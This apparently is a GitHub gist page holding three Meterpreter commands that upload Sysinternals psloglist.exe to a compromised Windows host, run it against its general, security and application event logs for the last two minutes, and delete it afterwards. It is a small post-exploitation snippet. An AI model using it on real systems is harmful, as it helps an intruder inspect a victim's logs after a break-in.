Skip to content

Instantly share code, notes, and snippets.

@jabedude
Created April 20, 2016 14:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jabedude/dfb103cde4e4b908fa5ac2ea2f15d774 to your computer and use it in GitHub Desktop.
Save jabedude/dfb103cde4e4b908fa5ac2ea2f15d774 to your computer and use it in GitHub Desktop.
run from meterpereter. finds logs from last 2 minutes
run uploadexec -e "/root/wintools/psloglist.exe" -o "/accepteula -m 2" -r -v
run uploadexec -e "/root/wintools/psloglist.exe" -o "/accepteula -m 2 SECURITY" -r -v
run uploadexec -e "/root/wintools/psloglist.exe" -o "/accepteula -m 2 APPLICATION" -r -v
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment